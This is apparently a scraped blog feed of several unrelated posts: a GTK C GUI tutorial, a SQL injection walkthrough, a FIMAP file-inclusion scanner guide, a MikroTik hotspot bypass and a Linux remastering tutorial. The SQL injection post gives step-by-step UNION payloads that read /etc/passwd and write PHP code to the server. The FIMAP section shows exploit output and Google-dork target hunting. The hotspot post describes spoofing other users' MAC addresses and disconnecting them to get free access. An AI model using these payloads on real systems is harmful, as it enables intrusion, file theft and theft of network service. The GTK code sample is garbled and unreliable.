You know, Linux is an Operating System that work with C Language. And, because it is open-source, we can edit, modify, add, or even make any customization on the operating system. In this case, we try to make simple GUI using C.

I assumed, you already know the syntax of C. So, I would have to explain that. Now, let’s stop the crap and see this script :

# include <gtk/gtk.h>

static gint window_closed (GtkWidget* window, GdkEventAny* even,
gpointer data);

int main (int argc, char *argv[])

{
GtkWidget* window;
GtkWidget* label;
gtk_init (&argc, &argv);
window = gtk_window_new (GTK_WINDOW_TOPLEVEL);
gtk_window_set_title(GTK_WINDOW(window),”Did You Read Me??This is
The Window Label”);
label = gtk_label_new (“Did You Read Me??”/n”This is the message in
the
window”);
gtk_signal_connect (GTK_CONTAINER
(window),”delete_event”,GTK_SIGNAL_FUNC(window_closed),NULL);
gtk_widget_show_all (window);
gtk_main ();
return 0;
}

static gint window_closed(GtkWidget* window, GdkEventAny* even,
gpointer data)
{
gtk_main_quit();
return FALSE;
}

Then, let’s see the result. First, you have to save the script in to a c file. Let say, the file name is “gui.c”. Then, go to the shell prompt (terminal/konsole) and compile it with this command :

~# gcc gui.c -o result_file ‘pkg-config –cflags –libs gtk+2.0′

The ‘pkg-config –cflags –libs gtk+2.0‘ is important, because this mean, we compile the script with calling the GTK library.

Ok, its 3.00 AM now…time to sleep..We’ll continue the explanation of the script on my next post. So, stay tune guys…

I’ll skip the step when we seaching the hole. I’ll just jump into the steps where this penetration possibly happen. Here they are :

• after the target was located, let’s call it : “www.target.com/article.php?id=1“…and the hole was found at “www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,2,3–“…and the lucky number was found at “2“. we can just do the next step.
• try to look what is the operating system of the server, we can use this command:

www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,version(),3–
this command will resulting an output, ex: 5.0.2-log or 5.0.2-ntfamily, the output with “log” means the server is using Linux and the “Nt” means the server using windows operating system.

www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,datadir(),3–
this command will resulting an output “/var/lib/mysql/” or “D:/http/bin/mysql/“…did you got that?? :p

• Now, lets check the permission, the command is :

www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,file_priv,3 FROM mysql.user,3–

this command should be showing an output “Y“, “N“, “error“, or nothing happend/blank output. The N and Error means that we can’t write using the current database user. But, the Y and blank output means we can to write (or exactly injecting to wrtie trough the SQL vulnerability).

• then, try to load a file that must be in the server, for linux operating system, try “/etc/passwd” file, or in the Windows, try to load “boot.ini” file. But first, you have to convert the complete file paht into hex format. The command is :

www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,loadfile(0x2f6574632f706173737764),3–

• If the target has shown the result, all you havve to do is find the crucial files like “httpd.conf”, “apache.conf”, or any else. It is the hardest step, because we have to guessing where the file is
• Let say you have found the file, you can analyse where is the path that you can write. Not just writing our command, but also copying the certain file. Try this command :

www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,loadfile(0x2f6574632f706173737764),3 INTO OUTFILE ‘../../target/dir/file.php –>> to copy a specific file

www.target.com/article.php?id=1+AND+2=1+SELECT UNION+1,’code’,3 INTO OUTFILE ‘../../target/dir/file.php –>> to write a specific code into a file

• So, if you could executing a harmfull php code to the target, why are you  should find the administrator page hardly???

That’s it guys…Now, are you still using the default settings of SQL???

Just for refference, read this article closely…:p

1. Download the FIMAP
You can download this tool here or here.

2. Extract the compressed file
to extract the downloaded file, use the “tar -xvf” command. So it will be like this :
root@bt:~# tar -xvf fimap_alpha_v07.tar.gz

3. Then go to the extracted directory
Just write cd…I’m sure you’ve already knew it.

4. Run the FIMAP
To run this tool, you can type “./fimap.py” or “python fimap.py”

5. The output must be a help page to use this tool

6. a. To scan a single page
To scanning s single page, you have to input the target url path completely, examples :
root@bt:fimap_alpha_v07#./fimap.py -s -u http://target.site/index.php?cat=main

If there was a bug/vulnerability founded in the url, it will shown like this:
fimap v.07 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: ‘http://target.site/index.php?cat=main’
[OUT] Parsing URL ‘http://target.site/index.php?cat=main’…
[INFO] Fiddling around with URL…
[OUT] Possible file inclusion found! -> ‘http://target.site/index.php?cat=a4EihiFP’ with Parameter ‘cat’.
[OUT] Identifying Vulnerability ‘http://target.site/index.php?cat=main’ with Parameter ‘cat’…
[INFO] Scriptpath received: ‘/www/target’
[INFO] Trying NULL-Byte Poisoning to get rid of the suffix…
[INFO] NULL-Byte Poisoning successfull!
[INFO] Testing file ‘/etc/passwd’…
[INFO] Testing file ‘/proc/self/environ’…
[INFO] Skipping absolute file ‘php://input’.
[INFO] Testing file ‘/var/log/apache2/access.log’…
[INFO] Testing file ‘/var/log/apache/access.log’…
[INFO] Testing file ‘/var/log/httpd/access.log’…
[INFO] Testing file ‘/var/log/apache2/access_log’…
[INFO] Testing file ‘/var/log/apache/access_log’…
[INFO] Testing file ‘/var/log/httpd/access_log’…
[INFO] Skipping remote file ‘http://www.phpbb.de/index.php’.
[INFO] Skipping remote file ‘http://www.uni-bonn.de/Frauengeschichte/index.html’.
[INFO] Skipping remote file ‘http://www.kah-bonn.de/index.htm?presse/winterthur.htm’.
##################################################################
#[1] Possible File Injection                                     #
##################################################################
#  [URL]      http://target.site/index.php?cat=main       #
#  [PARAM]    cat                                                #
#  [PATH]     /www/target                                         #
#  [TYPE]     Relative with appendix ‘.php’                      #
#  [NULLBYTE] Works.                                           #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd -> ../../../etc/passwd%00    #
##################################################################

b. To scan the multiple pages at once
First, you have to make the list of the target. For the example, I’ve made the list and I saved the file wich named “targetlist.txt” and I save this file at /tmp directory. Then, I can execute the command with this command :
root@bt:fimap_alpha_v07#./fimap.py -m -l ‘/tmp/targetlist.txt’

c. Use google to search any File Inclusion errors
Since we knew that file inclusion sometimes could be found in any include function at the php syntax, we can search for it with any file that usually used by the web-maker. You can use this command :
root@bt:fimap_alpha_v07#./fimap.py -g -q ‘inurl:php?cat= site:.com‘
And so many more function or feature in this tool, all you have to do is explore it by yourself. But, please don’t use this tool to penetrating and cracking someone website.

I want to start with a simple question here…’How secure was your Hotspot Area?‘..In some case, there’s a bored thing when we got an access point with a login form. Why we should fill this form if we could passing away??And the second question is ‘How to bypass this mikrotik security?‘

So, let’s begin :

1. Let’s recognize what metode that used :
   This is an important step, except you’ve already knew what security methode that has used by the administrator. If the administrator using the Aunthentification method, all you have to do is :
   • Get connected to the network
   • Make sure you got the IP address and the DNS address
   • Run the “NetCut” tool (For win***s), or “wireshark (for linux” then scan your entire network.
   • Look at the clients that already connected to the network. Copy the MAC address to your MAC address.
   • Restart the network, and then re-connect to the network
   • …that’s it..!!! You got it man…
2. If the administrator using the Authorization method, all you have to do is :
   • Try to follow the first step method. If you still can’t browsing, use the wireshark to listening any communication around the network. You can try change your MAC address to the connected client MAC address before connecting the network, or you can try to edit the IP address configuration manually, including the DNS configuration.
   • If still doesn’t works. Try to disconnect the already connected client that you’ve copied the MAC address.
   • Still doesn’t work??wow..the admin must be an expert !!!
3. If the admin using Accounting method, all you have to do is :
   • Try the first step. Then run the wireshark
   • Classified the client IP’s (in case the admin made a different class for each client, usually in Accounting method, there is a VIP customer)
   • Try to change your MAC address to each client class. This step is used to attemp we could have a VIP customer facility.

So, that’s all folks…Hope you can try this out..

If you are administrator, you have to patch this. You can read the how to at http://whitesecure.com.

..:D..

]]> http://www.toolshowto.com/?feed=rss2&p=162 0 http://www.toolshowto.com/?p=143 http://www.toolshowto.com/?p=143#comments Thu, 07 Jan 2010 10:05:46 +0000 biohazards http://www.toolshowto.com/?p=143 hi guys,

Let’s talk about ‘remaster’, what is it? With a simple words we can say, ‘remaster’ is how we can build our own Operating System that reflecting ourself. However, in this case, ‘remaster’-ing is when we modifying an Operating System to be what we want to. That will be including changing the themes, applications, or anything else. So, let’s get in on…

Before beginning to remaster something, we have to preparing the list of application that have to be installed, the image for backgroud, themes, logo, and everything…If we got that, remastering will be just finish in an hour. Incredible isn’t it?

Now, I’m using openSuSE 11.2. Actually, we can do the ‘remastering’ thing directly on our computer. But, i found this “incredible” site. The site that allow us to ‘remastering’ an Novell Operating System. All we have to do is register to the site, then follow the steps. It is “susestudio.com” , the site that providing us to remaster/rebuild the Novell Operating System. This site use “kiwi” as the back-ends. I assume u have no problem to the register and signing in. Now let’s follow the steps.

1. Choose what template of remaster do you want, here I choose “gnome” template.

2. Create the name of your own Operating System

3. Go to the “Software” tab, here you can add or remove any package or pattern. And in case u need to upload any rpm file or add the another repository. A little tips, you should know what application do you need according the list had you made before.

4. When done with add/removing application. go to the “Configuration” tab. Here you can configure any necessary configuration, like keyboard lay-out, language, artwork, and everything else. In the “Personalize” sub menu, you can upload your own logo’s and background image.

5. After that, you can just go to the build tab to build the Operating System.

So, it’s pretty easy isn’t it?

But in Mandriva there is steps to change, so lets get in on…

1. First find and back-up your “gfxmenu” file, because on Mandriva, this is the file that contain the picture that we want to modify. This file shoul be at “/boot” directory.
2. Enter to the terminal, and get in to your back-up “gfxmenu” file.
3. Then, extract that file with this command :

~# cpio -i < gfxmenu

4. After that, get in to that extracted folder and found the “back.jpg” file. This is the file that we will to change.

5. Edit your own background with 256 color and 8 bits depth (you can use GIMP to do this). And don’t forget to makesure the image size is 600×480 px or 800×600 px.

6. Save that picture with name “back.jpg“, then replace it in to the “gfxmenu” extracted folder.

7. Re-compress those files with this command :

~# ls | cpio -o > gfxmenu

8. Copy the ‘gfxmenu’ to the original location: /boot/

7. Reboot your PC/Laptop to see the change

And, that’s it !!! We had change the bootloader image…

Everything gonna be easy with open-source…………